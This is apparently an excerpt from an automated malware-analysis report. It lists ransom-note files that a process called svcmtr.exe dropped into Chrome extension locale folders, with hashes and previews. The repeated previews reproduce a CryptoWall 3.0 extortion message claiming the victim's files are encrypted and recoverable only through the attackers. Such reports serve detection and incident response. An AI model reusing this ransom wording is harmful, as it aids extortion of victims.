                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\th\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\tr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\tr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\uk\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\uk\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ur\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ur\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\vi\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\vi\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_CN\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_CN\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_HK\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_HK\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_TW\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_TW\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
